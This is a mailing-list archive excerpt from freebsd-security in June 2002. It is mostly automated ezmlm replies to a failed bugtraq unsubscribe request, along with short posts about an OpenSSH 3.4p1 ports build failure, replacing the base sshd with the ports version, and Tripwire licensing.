mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 06E7837B405 for ; Fri, 28 Jun 2002 23:26:51 -0700 (PDT) Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) by mx1.FreeBSD.org (Postfix) with SMTP id 0C86543E06 for ; Fri, 28 Jun 2002 23:26:50 -0700 (PDT) (envelope-from bugtraq-return-@securityfocus.com) Received: (qmail 14755 invoked by alias); 29 Jun 2002 06:26:06 -0000 Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm List-Help: List-Post: List-Subscribe: Date: 29 Jun 2002 06:26:06 -0000 Message-ID: <1025331966.14754.ezmlm@securityfocus.com> From: bugtraq-help@securityfocus.com To: security@freebsd.org Delivered-To: responder for bugtraq@securityfocus.com Received: (qmail 14749 invoked from network); 29 Jun 2002 06:26:06 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 29 Jun 2002 06:26:06 -0000 Received: (qmail 17497 invoked by alias); 29 Jun 2002 06:21:25 -0000 Received: (qmail 17493 invoked from network); 29 Jun 2002 06:21:18 -0000 Received: from telecom.ee.itb.ac.id (167.205.48.35) by mail.securityfocus.com with SMTP; 29 Jun 2002 06:21:18 -0000 Received: (qmail 22106 invoked by uid 1019); 29 Jun 2002 06:26:32 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 29 Jun 2002 06:26:32 -0000 MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Subject: ezmlm response Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi! This is the ezmlm program. I'm managing the bugtraq@securityfocus.com mailing list. I'm working for my owner, who can be reached at bugtraq-owner@securityfocus.com. I'm sorry, I've been unable to carry out your request, since the address security@freebsd.org was not on the bugtraq mailing list when I received your request and is not a subscriber of this list. If you unsubscribe, but continue to receive mail, you're subscribed under a different address than the one you currently use. Please look at the header for: 'Return-Path: ' This shows that the subscription address is ``user@host.dom''. The unsubscribe address for this user would be: 'bugtraq-unsubscribe-user=host.dom@securityfocus.com'. Just mail to that address, adjusted for the real subscription address. If the message has a ``List-Unsubscribe:'' header, you can send a message to the address in that header. It contains the subscription already coded into it. For some mail programs, you need to make the headers visible to see the return path: For Eudora 4.0, click on the "Blah blah ..." button. For PMMail, click on "Window->Show entire message/header". If this still doesn't work, I'm sorry to say that I can't help you. Please FORWARD a list message together with a note about what you're trying to achieve and a list of addresses that you might be subscribed under to my owner: who will take care of it. My owner is a little bit slower than I am, so please be patient. --- Administrative commands for the bugtraq list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. If you need to get in touch with the human owner of this list, please send a message to: Please include a FORWARDED list message with ALL HEADERS intact to make it easier to help you. --- Enclosed is a copy of the request I received. Return-Path: Received: (qmail 14749 invoked from network); 29 Jun 2002 06:26:06 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 29 Jun 2002 06:26:06 -0000 Received: (qmail 17497 invoked by alias); 29 Jun 2002 06:21:25 -0000 Received: (qmail 17493 invoked from network); 29 Jun 2002 06:21:18 -0000 Received: from telecom.ee.itb.ac.id (167.205.48.35) by mail.securityfocus.com with SMTP; 29 Jun 2002 06:21:18 -0000 Received: (qmail 22106 invoked by uid 1019); 29 Jun 2002 06:26:32 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 29 Jun 2002 06:26:32 -0000 Date: Sat, 29 Jun 2002 13:26:32 +0700 (JAVT) From: rofiq To: bugtraq-uc.1025322105.anappojclppmkdgakbfc-security=freebsd.org@securityfocus.com cc: security@freebsd.org Subject: Re: confirm unsubscribe from bugtraq@securityfocus.com In-Reply-To: <1025322105.19302.ezmlm@securityfocus.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII -- * Rofiq Yuli, rofiq@telecom.ee.itb.ac.id On 29 Jun 2002 bugtraq-help@securityfocus.com wrote: > Hi! This is the ezmlm program. I'm managing the > bugtraq@securityfocus.com mailing list. > > I'm working for my owner, who can be reached > at bugtraq-owner@securityfocus.com. > > To confirm that you would like > > security@freebsd.org > > removed from the bugtraq mailing list, please send an empty reply > to this address: > > bugtraq-uc.1025322105.anappojclppmkdgakbfc-security=freebsd.org@securityfocus.com > > Usually, this happens when you just hit the "reply" button. > If this does not work, simply copy the address and paste it into > the "To:" field of a new message. > > I haven't checked whether your address is currently on the mailing list. > To see what address you used to subscribe, look at the messages you are > receiving from the mailing list. Each message has your address hidden > inside its return path; for example, mary@xdd.ff.com receives messages > with return path: -mary=xdd.ff.com@securityfocus.com. > > Some mail programs are broken and cannot handle long addresses. If you > cannot reply to this request, instead send a message to > and put the entire address listed above > into the "Subject:" line. > > > --- Administrative commands for the bugtraq list --- > > I can handle administrative requests automatically. Please > do not send them to the list address! Instead, send > your message to the correct command address: > > For help and a description of available commands, send a message to: > > > To subscribe to the list, send a message to: > > > To remove your address from the list, just send a message to > the address in the ``List-Unsubscribe'' header of any list > message. If you haven't changed addresses since subscribing, > you can also send a message to: > > > or for the digest to: > > > For addition or removal of addresses, I'll send a confirmation > message to that address. When you receive it, simply reply to it > to complete the transaction. > > If you need to get in touch with the human owner of this list, > please send a message to: > > > > Please include a FORWARDED list message with ALL HEADERS intact > to make it easier to help you. > > --- Enclosed is a copy of the request I received. > > Return-Path: > Received: (qmail 19297 invoked from network); 29 Jun 2002 03:41:45 -0000 > Received: from unknown (HELO securityfocus.com) (66.38.151.9) > by lists.securityfocus.com with SMTP; 29 Jun 2002 03:41:45 -0000 > Received: (qmail 9149 invoked by alias); 29 Jun 2002 03:37:02 -0000 > Received: (qmail 9145 invoked from network); 29 Jun 2002 03:37:02 -0000 > Received: from www5.securityfocus.com (HELO mail.securityfocus.com) (66.38.151.15) > by mail.securityfocus.com with SMTP; 29 Jun 2002 03:37:02 -0000 > Received: (qmail 14047 invoked by uid 1001); 29 Jun 2002 03:40:37 -0000 > Date: 29 Jun 2002 03:40:36 -0000 > Message-ID: <20020629034036.14046.qmail@mail.securityfocus.com> > From: root@mail.securityfocus.com > Content-Type: text/plain > Content-Disposition: inline > Content-Transfer-Encoding: binary > MIME-Version: 1.0 > X-Mailer: MIME-tools 5.411 (Entity 5.404) > To: bugtraq-unsubscribe-security=freebsd.org@securityfocus.com > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 23:27:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 50B7837B400 for ; Fri, 28 Jun 2002 23:26:58 -0700 (PDT) Received: from telecom.ee.itb.ac.id (telecom.ee.itb.ac.id [167.205.48.35]) by mx1.FreeBSD.org (Postfix) with SMTP id EDE7743E0A for ; Fri, 28 Jun 2002 23:26:45 -0700 (PDT) (envelope-from rofiq@telecom.ee.itb.ac.id) Received: (qmail 22106 invoked by uid 1019); 29 Jun 2002 06:26:32 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 29 Jun 2002 06:26:32 -0000 Date: Sat, 29 Jun 2002 13:26:32 +0700 (JAVT) From: rofiq To: bugtraq-uc.1025322105.anappojclppmkdgakbfc-security=freebsd.org@securityfocus.com Cc: security@freebsd.org Subject: Re: confirm unsubscribe from bugtraq@securityfocus.com In-Reply-To: <1025322105.19302.ezmlm@securityfocus.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -- * Rofiq Yuli, rofiq@telecom.ee.itb.ac.id On 29 Jun 2002 bugtraq-help@securityfocus.com wrote: > Hi! This is the ezmlm program. I'm managing the > bugtraq@securityfocus.com mailing list. > > I'm working for my owner, who can be reached > at bugtraq-owner@securityfocus.com. > > To confirm that you would like > > security@freebsd.org > > removed from the bugtraq mailing list, please send an empty reply > to this address: > > bugtraq-uc.1025322105.anappojclppmkdgakbfc-security=freebsd.org@securityfocus.com > > Usually, this happens when you just hit the "reply" button. > If this does not work, simply copy the address and paste it into > the "To:" field of a new message. > > I haven't checked whether your address is currently on the mailing list. > To see what address you used to subscribe, look at the messages you are > receiving from the mailing list. Each message has your address hidden > inside its return path; for example, mary@xdd.ff.com receives messages > with return path: -mary=xdd.ff.com@securityfocus.com. > > Some mail programs are broken and cannot handle long addresses. If you > cannot reply to this request, instead send a message to > and put the entire address listed above > into the "Subject:" line. > > > --- Administrative commands for the bugtraq list --- > > I can handle administrative requests automatically. Please > do not send them to the list address! Instead, send > your message to the correct command address: > > For help and a description of available commands, send a message to: > > > To subscribe to the list, send a message to: > > > To remove your address from the list, just send a message to > the address in the ``List-Unsubscribe'' header of any list > message. If you haven't changed addresses since subscribing, > you can also send a message to: > > > or for the digest to: > > > For addition or removal of addresses, I'll send a confirmation > message to that address. When you receive it, simply reply to it > to complete the transaction. > > If you need to get in touch with the human owner of this list, > please send a message to: > > > > Please include a FORWARDED list message with ALL HEADERS intact > to make it easier to help you. > > --- Enclosed is a copy of the request I received. > > Return-Path: > Received: (qmail 19297 invoked from network); 29 Jun 2002 03:41:45 -0000 > Received: from unknown (HELO securityfocus.com) (66.38.151.9) > by lists.securityfocus.com with SMTP; 29 Jun 2002 03:41:45 -0000 > Received: (qmail 9149 invoked by alias); 29 Jun 2002 03:37:02 -0000 > Received: (qmail 9145 invoked from network); 29 Jun 2002 03:37:02 -0000 > Received: from www5.securityfocus.com (HELO mail.securityfocus.com) (66.38.151.15) > by mail.securityfocus.com with SMTP; 29 Jun 2002 03:37:02 -0000 > Received: (qmail 14047 invoked by uid 1001); 29 Jun 2002 03:40:37 -0000 > Date: 29 Jun 2002 03:40:36 -0000 > Message-ID: <20020629034036.14046.qmail@mail.securityfocus.com> > From: root@mail.securityfocus.com > Content-Type: text/plain > Content-Disposition: inline > Content-Transfer-Encoding: binary > MIME-Version: 1.0 > X-Mailer: MIME-tools 5.411 (Entity 5.404) > To: bugtraq-unsubscribe-security=freebsd.org@securityfocus.com > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 4:59:27 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9FEA237B400 for ; Sat, 29 Jun 2002 04:59:18 -0700 (PDT) Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) by mx1.FreeBSD.org (Postfix) with SMTP id 5CBB243E06 for ; Sat, 29 Jun 2002 04:59:14 -0700 (PDT) (envelope-from bugtraq-return-@securityfocus.com) Received: (qmail 7064 invoked by alias); 29 Jun 2002 11:51:47 -0000 Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm List-Help: List-Post: List-Subscribe: Date: 29 Jun 2002 11:51:47 -0000 Message-ID: <1025351507.7063.ezmlm@securityfocus.com> From: bugtraq-help@securityfocus.com To: security@freebsd.org Delivered-To: responder for bugtraq@securityfocus.com Received: (qmail 7058 invoked from network); 29 Jun 2002 11:51:47 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 29 Jun 2002 11:51:47 -0000 Received: (qmail 1329 invoked by alias); 29 Jun 2002 11:47:05 -0000 Received: (qmail 1325 invoked from network); 29 Jun 2002 11:47:04 -0000 Received: from p50852c12.dip.t-dialin.net (HELO freebsd.linux-site.net) (80.133.44.18) by mail.securityfocus.com with SMTP; 29 Jun 2002 11:47:04 -0000 Received: from WKS1 (client1.freebsd.linux-site.net [192.168.0.2]) by freebsd.linux-site.net (8.11.6/8.11.6) with SMTP id g5TBoEG08567 for ; Sat, 29 Jun 2002 13:50:15 +0200 (CEST) (envelope-from sales@nntp.eu.org) MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Subject: ezmlm response Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi! This is the ezmlm program. I'm managing the bugtraq@securityfocus.com mailing list. I'm working for my owner, who can be reached at bugtraq-owner@securityfocus.com. I'm sorry, I've been unable to carry out your request, since the address security@freebsd.org was not on the bugtraq mailing list when I received your request and is not a subscriber of this list. If you unsubscribe, but continue to receive mail, you're subscribed under a different address than the one you currently use. Please look at the header for: 'Return-Path: ' This shows that the subscription address is ``user@host.dom''. The unsubscribe address for this user would be: 'bugtraq-unsubscribe-user=host.dom@securityfocus.com'. Just mail to that address, adjusted for the real subscription address. If the message has a ``List-Unsubscribe:'' header, you can send a message to the address in that header. It contains the subscription already coded into it. For some mail programs, you need to make the headers visible to see the return path: For Eudora 4.0, click on the "Blah blah ..." button. For PMMail, click on "Window->Show entire message/header". If this still doesn't work, I'm sorry to say that I can't help you. Please FORWARD a list message together with a note about what you're trying to achieve and a list of addresses that you might be subscribed under to my owner: who will take care of it. My owner is a little bit slower than I am, so please be patient. --- Administrative commands for the bugtraq list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. If you need to get in touch with the human owner of this list, please send a message to: Please include a FORWARDED list message with ALL HEADERS intact to make it easier to help you. --- Enclosed is a copy of the request I received. Return-Path: Received: (qmail 7058 invoked from network); 29 Jun 2002 11:51:47 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 29 Jun 2002 11:51:47 -0000 Received: (qmail 1329 invoked by alias); 29 Jun 2002 11:47:05 -0000 Received: (qmail 1325 invoked from network); 29 Jun 2002 11:47:04 -0000 Received: from p50852c12.dip.t-dialin.net (HELO freebsd.linux-site.net) (80.133.44.18) by mail.securityfocus.com with SMTP; 29 Jun 2002 11:47:04 -0000 Received: from WKS1 (client1.freebsd.linux-site.net [192.168.0.2]) by freebsd.linux-site.net (8.11.6/8.11.6) with SMTP id g5TBoEG08567 for ; Sat, 29 Jun 2002 13:50:15 +0200 (CEST) (envelope-from sales@nntp.eu.org) Reply-To: From: "=?us-ascii?Q?NEWS.EUROPE?=" To: Subject: . Date: Sat, 29 Jun 2002 13:51:49 +0200 Message-ID: <000e01c21f63$5a4e9d00$0200a8c0@WKS1> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <1025322105.19302.ezmlm@securityfocus.com> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2462.0000 Importance: Normal . To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 5:55:27 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1BEC837B400 for ; Sat, 29 Jun 2002 05:55:25 -0700 (PDT) Received: from thufir.bluecom.no (thufir.bluecom.no [217.118.32.12]) by mx1.FreeBSD.org (Postfix) with ESMTP id CB2F543E06 for ; Sat, 29 Jun 2002 05:55:23 -0700 (PDT) (envelope-from arvinn@rns.no) Received: from dus (dell.sandakeronline.com [217.118.33.65]) by thufir.bluecom.no (8.11.5/8.11.5) with SMTP id g5TCtJW19894 for ; Sat, 29 Jun 2002 14:55:19 +0200 Message-ID: <009a01c21f6c$37f99df0$0201a8c0@dus> From: =?iso-8859-1?Q?Arvinn_L=F8kkebakken?= To: Subject: openssh 3.4p1 ports installation fails Date: Sat, 29 Jun 2002 14:55:17 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On two out of four FreeBSD boxes the port installations of OpenSSH 3.4p1 stops at this point: >> Patch patch-readpassphrase.c failed to apply cleanly. >> Patch(es) patch-auth.c patch-auth1.c patch-auth2.c patch-clientloop.c patch-defines.h patch-misc.c applied cleanly. *** Error code 1 Stop in /usr/ports/security/openssh-portable. On the other two FreeBSD servers it worked perfectely. Any ideas why this happened? Arvinn To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 10:47:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 956C837B400; Sat, 29 Jun 2002 10:47:23 -0700 (PDT) Received: from blue.gerhardt-it.com (gw.gerhardt-it.com [204.83.38.103]) by mx1.FreeBSD.org (Postfix) with ESMTP id D47A443E1A; Sat, 29 Jun 2002 10:47:22 -0700 (PDT) (envelope-from scott@gerhardt-it.com) Received: from [24.71.179.142] (h24-71-179-142.ss.shawcable.net [24.71.179.142]) by blue.gerhardt-it.com (Postfix) with ESMTP id 4670B10024; Sat, 29 Jun 2002 11:47:16 -0600 (CST) User-Agent: Microsoft-Entourage/10.1.0.2006 Date: Sat, 29 Jun 2002 11:47:10 -0600 Subject: Re: Sshd fix From: Scott Gerhardt To: FreeBSD user Cc: FreeBSD , Message-ID: In-Reply-To: <20020628190711.M7121-100000@Amber.XtremeDev.com> Mime-version: 1.0 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Couldn't /usr/ports/security/openssh be used instead? -- Scott On 6/28/02 7:07 PM, "FreeBSD user" wrote: > cd /usr/ports/security/openssh-portable && make -DOPENSSH_OVERWRITE_BASE > install distclean > > On Fri, 28 Jun 2002, Scott Gerhardt wrote: > >> For the sshd fix, could't I just strip the base openssh from the system and >> install the updated openssh-3.4 from the ports? >> >> If so, what is the best method to disable/eliminate openssh from the base >> system? >> >> >> Have a happy Canada Day weekend :-) >> >> Regards, >> >> >> -- >> Scott Gerhardt, P.Geo. >> Gerhardt Information Technologies [G-IT] >> >> >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> with "unsubscribe freebsd-questions" in the body of the message >> >> >> > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Scott Gerhardt, P.Geo. Gerhardt Information Technologies [G-IT] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 10:47:57 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 089B837B401 for ; Sat, 29 Jun 2002 10:47:50 -0700 (PDT) Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) by mx1.FreeBSD.org (Postfix) with SMTP id 929DF43E2F for ; Sat, 29 Jun 2002 10:47:47 -0700 (PDT) (envelope-from bugtraq-return-@securityfocus.com) Received: (qmail 18080 invoked by alias); 29 Jun 2002 17:46:57 -0000 Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm List-Help: List-Post: List-Subscribe: Date: 29 Jun 2002 17:46:57 -0000 Message-ID: <1025372817.18079.ezmlm@securityfocus.com> From: bugtraq-help@securityfocus.com To: security@freebsd.org Delivered-To: responder for bugtraq@securityfocus.com Received: (qmail 18074 invoked from network); 29 Jun 2002 17:46:57 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 29 Jun 2002 17:46:57 -0000 Received: (qmail 7837 invoked by alias); 29 Jun 2002 17:42:18 -0000 Received: (qmail 7833 invoked from network); 29 Jun 2002 17:42:17 -0000 Received: from npubs.com (HELO mail.npubs.com) (207.111.208.224) by mail.securityfocus.com with SMTP; 29 Jun 2002 17:42:17 -0000 Received: 8.12.2-(Neptune) MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Reply-To: bugtraq-uc.1025372817.dcomgaccpemgiccafegg-security=freebsd.org@securityfocus.com Subject: confirm unsubscribe from bugtraq@securityfocus.com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi! This is the ezmlm program. I'm managing the bugtraq@securityfocus.com mailing list. I'm working for my owner, who can be reached at bugtraq-owner@securityfocus.com. To confirm that you would like security@freebsd.org removed from the bugtraq mailing list, please send an empty reply to this address: bugtraq-uc.1025372817.dcomgaccpemgiccafegg-security=freebsd.org@securityfocus.com Usually, this happens when you just hit the "reply" button. If this does not work, simply copy the address and paste it into the "To:" field of a new message. I haven't checked whether your address is currently on the mailing list. To see what address you used to subscribe, look at the messages you are receiving from the mailing list. Each message has your address hidden inside its return path; for example, mary@xdd.ff.com receives messages with return path: -mary=xdd.ff.com@securityfocus.com. Some mail programs are broken and cannot handle long addresses. If you cannot reply to this request, instead send a message to and put the entire address listed above into the "Subject:" line. --- Administrative commands for the bugtraq list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. If you need to get in touch with the human owner of this list, please send a message to: Please include a FORWARDED list message with ALL HEADERS intact to make it easier to help you. --- Enclosed is a copy of the request I received. Return-Path: Received: (qmail 18074 invoked from network); 29 Jun 2002 17:46:57 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 29 Jun 2002 17:46:57 -0000 Received: (qmail 7837 invoked by alias); 29 Jun 2002 17:42:18 -0000 Date: 29 Jun 2002 17:42:18 -0000 Message-ID: <20020629174218.7836.qmail@securityfocus.com> Received: (qmail 7833 invoked from network); 29 Jun 2002 17:42:17 -0000 Received: from npubs.com (HELO mail.npubs.com) (207.111.208.224) by mail.securityfocus.com with SMTP; 29 Jun 2002 17:42:17 -0000 Received: 8.12.2-(Neptune) From: "NOC" To: Subject: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 10:47:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E999C37B405 for ; Sat, 29 Jun 2002 10:47:54 -0700 (PDT) Received: from mail1.workofstone.net (w121.z208177130.sjc-ca.dsl.cnc.net [208.177.130.121]) by mx1.FreeBSD.org (Postfix) with ESMTP id C168443E21 for ; Sat, 29 Jun 2002 10:47:53 -0700 (PDT) (envelope-from schluntz@greywolf.workofstone.net) Received: from greywolf.workofstone.net (greywolf.workofstone.net [172.20.1.2] (may be forged)) by mail1.workofstone.net (8.9.3/8.9.3) with ESMTP id KAA16767; Sat, 29 Jun 2002 10:47:51 -0700 (PDT) Received: from greywolf.workofstone.net (localhost [127.0.0.1]) by greywolf.workofstone.net (8.11.3nb1/8.11.6) with ESMTP id g5T9mvB21709; Sat, 29 Jun 2002 02:48:58 -0700 (PDT) To: deanmphillips@uswest.net Cc: freebsd-security@freebsd.org Subject: Re: Security Check Diffs Question Reply-To: "Sean J. Schluntz" In-Reply-To: Your message of "Tue, 24 Jul 2001 18:41:52 CDT." <200107242341.f6ONfpi99078@cdrrdslgw2poolA156.cdrr.uswest.net> Date: Sat, 29 Jun 2002 02:48:57 -0700 Message-ID: <21707.1025344137@greywolf.workofstone.net> From: "Sean J. Schluntz" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >For mission-critical servers, I prefer to use tripwire. Burn the binary >and the database onto a CDROM and it will be nearly tamper-proof. > >Oh yes, the default config file needs to be updated, but you really ought >to customize it anyway. Problem with that is it doesn't work in commercial envrionments unless you pay the fee for the commercial version of Tripwire. (excepting the freeware version for Linux only Tripwire) the public tripwire is only legal to put one copy on your network. -Sean ---------------------------------------------------------------------------- Sean J. Schluntz, GCUX 510-785-8949 Work of Stone http://www.workofstone.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 10:53: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B036D37B400 for ; Sat, 29 Jun 2002 10:52:56 -0700 (PDT) Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) by mx1.FreeBSD.org (Postfix) with SMTP id CFD0443E0A for ; Sat, 29 Jun 2002 10:52:55 -0700 (PDT) (envelope-from bugtraq-return-@securityfocus.com) Received: (qmail 18202 invoked by alias); 29 Jun 2002 17:52:06 -0000 Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm List-Help: List-Post: List-Subscribe: Date: 29 Jun 2002 17:52:06 -0000 Message-ID: <1025373126.18201.ezmlm@securityfocus.com> From: bugtraq-help@securityfocus.com To: security@freebsd.org Delivered-To: responder for bugtraq@securityfocus.com Received: (qmail 18196 invoked from network); 29 Jun 2002 17:52:06 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 29 Jun 2002 17:52:06 -0000 Received: (qmail 8068 invoked by alias); 29 Jun 2002 17:47:27 -0000 Received: (qmail 8064 invoked from network); 29 Jun 2002 17:47:26 -0000 Received: from 81-86-164-179.dsl.pipex.com (HELO nelly.internal.irrelevant.org) (81.86.164.179) by mail.securityfocus.com with SMTP; 29 Jun 2002 17:47:26 -0000 Received: from simond by nelly.internal.irrelevant.org with local (Exim 3.36 #1) id 17OMOx-00009E-00 for bugtraq-uc.1025372817.dcomgaccpemgiccafegg-security=freebsd.org@securityfocus.com; Sat, 29 Jun 2002 18:52:51 +0100 MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Subject: ezmlm response Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi! This is the ezmlm program. I'm managing the bugtraq@securityfocus.com mailing list. I'm working for my owner, who can be reached at bugtraq-owner@securityfocus.com. I'm sorry, I've been unable to carry out your request, since the address security@freebsd.org was not on the bugtraq mailing list when I received your request and is not a subscriber of this list. If you unsubscribe, but continue to receive mail, you're subscribed under a different address than the one you currently use. Please look at the header for: 'Return-Path: ' This shows that the subscription address is ``user@host.dom''. The unsubscribe address for this user would be: 'bugtraq-unsubscribe-user=host.dom@securityfocus.com'. Just mail to that address, adjusted for the real subscription address. If the message has a ``List-Unsubscribe:'' header, you can send a message to the address in that header. It contains the subscription already coded into it. For some mail programs, you need to make the headers visible to see the return path: For Eudora 4.0, click on the "Blah blah ..." button. For PMMail, click on "Window->Show entire message/header". If this still doesn't work, I'm sorry to say that I can't help you. Please FORWARD a list message together with a note about what you're trying to achieve and a list of addresses that you might be subscribed under to my owner: who will take care of it. My owner is a little bit slower than I am, so please be patient. --- Administrative commands for the bugtraq list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. If you need to get in touch with the human owner of this list, please send a message to: Please include a FORWARDED list message with ALL HEADERS intact to make it easier to help you. --- Enclosed is a copy of the request I received. Return-Path: Received: (qmail 18196 invoked from network); 29 Jun 2002 17:52:06 